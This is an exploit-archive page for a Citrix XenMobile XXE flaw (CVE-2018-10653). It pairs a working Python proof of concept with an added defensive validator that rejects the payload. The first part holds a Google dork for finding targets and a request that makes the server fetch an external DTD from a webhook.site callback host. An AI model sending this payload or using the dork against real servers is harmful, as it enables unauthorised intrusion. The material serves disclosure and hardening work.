
Citrix XenMobile Server 10.8 XML Injection

22 Jan 2020 | Reported by Jonas Lejon | Type: packetstorm | Source: packetstormsecurity.com

Code
```python
# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection
# Google Dork: inurl:zdm logon
# Date: 2019-11-28
# Exploit Author: Jonas Lejon
# Vendor Homepage: https://www.citrix.com
# Software Link:
# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3
# Tested on: XenMobile
# CVE : CVE-2018-10653

#!/usr/bin/python3
##
## PoC exploit test for the security vulnerability CVE-2018-10653 in
## XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28
## <[email protected]> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##

import requests
import sys
from pprint import pprint
import uuid
import urllib3

# Surf to https://webhook.site and copy/paste the URL below. Used for
# XXE callback: a vulnerable server fetches <WEBHOOK><id>/test.dtd while
# parsing the DOCTYPE, so the hit shows up in the webhook's request log.
WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"

if len(sys.argv) != 2:
    print("usage: %s https://<xenmobile-host>" % sys.argv[0])
    sys.exit(1)

# Per-run marker so a callback can be matched to this probe
id = str(uuid.uuid1())

# Out-of-band XXE payload: a parameter entity pointing at an external DTD,
# referenced immediately inside the internal subset of the plist DOCTYPE.
xml = ('''<?xml version="1.0" encoding="UTF-8" standalone='no'?>'''
       '''<!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "''' + WEBHOOK + id +
       '''/test.dtd">%j00t9; ]>''')

print(id)

# The MDM check-in endpoint parses the body as an Apple MDM plist.
# verify=False because XenMobile is commonly deployed with a self-signed
# certificate; the urllib3 warning is silenced to keep the output readable.
urllib3.disable_warnings()
response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False,
    headers={'User-Agent': 'MDM/1.0',
             'Connection': 'close',
             'Content-Type': 'application/x-apple-aspen-mdm'},
    data=xml, stream=True
)
print(response.content)
print(response.text)
pprint(response)
```
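Added example (not part of Jonas Lejon's PoC and not Citrix's code): the server-side gate a hardened MDM check-in endpoint would apply to a body like the one the PoC sends. It rebuilds the PoC's probe body so the check can be exercised offline, accepts only Apple's public plist DOCTYPE, rejects any internal subset, SYSTEM identifier, entity declaration or parameter-entity reference, and hands the body to plistlib only after that. The webhook URL, probe id and TokenUpdate check-in plist are constructed for the example, and the function names are the example's own.

```python
from __future__ import annotations

import plistlib
import re
import uuid

# The only DOCTYPE a legitimate Apple plist carries (whitespace-normalised).
APPLE_PLIST_DOCTYPE = ('<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
                       '"http://www.apple.com/DTDs/PropertyList-1.0.dtd">')

# Matches a DOCTYPE declaration, capturing the root name, the external
# identifier part and an optional internal subset in [...].
DOCTYPE_RE = re.compile(
    r"<!DOCTYPE\s+(?P<name>[^\s\[>]+)(?P<external>[^\[>]*)"
    r"(?:\[(?P<subset>.*?)\])?\s*>",
    re.IGNORECASE | re.DOTALL,
)


def build_xxe_probe(webhook: str, probe_id: str) -> str:
    """Rebuild the PoC's request body: an out-of-band XXE probe whose
    parameter entity makes the parser fetch <webhook><probe_id>/test.dtd."""
    return (
        "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone='no'?>"
        '<!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "'
        + webhook + probe_id + '/test.dtd">%j00t9; ]>'
    )


def classify_doctype(body: str) -> tuple[str, list[str]]:
    """Return ("none", []), ("apple-plist", []) or ("reject", reasons)."""
    m = DOCTYPE_RE.search(body)
    if m is None:
        return "none", []
    decl = m.group(0)
    reasons = []
    if m.group("subset") is not None:
        reasons.append("internal DTD subset")
    if re.search(r"\bSYSTEM\b", decl, re.IGNORECASE):
        reasons.append("SYSTEM identifier")
    if re.search(r"<!ENTITY", decl, re.IGNORECASE):
        reasons.append("ENTITY declaration")
    if re.search(r"%\w+;", decl):
        reasons.append("parameter entity reference")
    if m.group("name").lower() != "plist":
        reasons.append("root element is not plist")
    if reasons:
        return "reject", reasons
    # No subset and no entity machinery: allow only Apple's public DTD.
    if re.sub(r"\s+", " ", decl) == APPLE_PLIST_DOCTYPE:
        return "apple-plist", []
    return "reject", ["unexpected external identifier"]


def parse_mdm_plist(body: str) -> dict:
    """Gate the body on classify_doctype() before any XML parser sees it."""
    verdict, reasons = classify_doctype(body)
    if verdict == "reject":
        raise ValueError("rejected MDM body: " + ", ".join(reasons))
    return plistlib.loads(body.encode("utf-8"))


# Constructed sample of a benign MDM check-in body (not captured traffic).
BENIGN_CHECKIN = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>MessageType</key>
  <string>TokenUpdate</string>
  <key>UDID</key>
  <string>00000000-0000-0000-0000-000000000000</string>
</dict>
</plist>
"""

if __name__ == "__main__":
    # Hypothetical webhook URL; the PoC reads a real one from webhook.site.
    probe = build_xxe_probe("https://webhook.site/00000000-example/",
                            str(uuid.uuid4()))
    for label, body in (("benign check-in", BENIGN_CHECKIN), ("XXE probe", probe)):
        verdict, reasons = classify_doctype(body)
        print(f"{label}: {verdict} {reasons}")
    print(parse_mdm_plist(BENIGN_CHECKIN)["MessageType"])
```

Rejecting every DOCTYPE would break legitimate MDM clients, which normally send the standard plist DOCTYPE on each check-in; the allow-list above keeps that and still refuses the PoC body, whose DOCTYPE carries an internal subset with an external parameter entity. The pre-parse scan is a belt-and-braces control: the XML parser behind the endpoint must also have DTD loading and external entity resolution disabled.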
